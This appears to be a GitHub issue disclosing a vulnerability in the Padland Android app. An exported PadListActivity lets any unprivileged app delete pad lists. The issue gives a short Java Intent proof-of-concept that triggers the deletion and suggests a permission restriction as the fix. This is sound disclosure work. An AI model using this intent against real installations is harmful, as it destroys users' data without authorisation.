search

mikifus / padland

Padland is a tool to manage, share, remember and read collaborative documents based on the Etherpad technology in Android.
Apache License 2.0
62 stars 15 forks source link

A vulnerability in PadListActivity and fix suggestions #68

Closed nibienaohehe closed 2 years ago

nibienaohehe commented 2 years ago

Hello, I found a vulnerability in exported activity PadListActivity in the latest version. This vulnerability allows any app without any permission to delete any pad list. The following commands are used to reproduce it:

Intent intent = new Intent();
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
ComponentName cn=new ComponentName("com.mikifus.padland","com.mikifus.padland.PadListActivity");
intent.setComponent(cn);
Bundle ExtrasObj = new Bundle();
ArrayList pad_id_list = new ArrayList();
pad_id_list.add("1"); // add the nums to be deleted
ExtrasObj.putStringArrayList("pad_id", pad_id_list);
intent.putExtra("action", "delete");
intent.putExtras(ExtrasObj);
startActivity(intent);

Suggestion: Adding a permission restriction if keeping PadListActivity as exported

rugk commented 2 years ago

Got a mail with more details (if you wanna have them I can provide then) and directed the OP here. Also https://github.com/mikifus/padland/issues/67 was also provided here.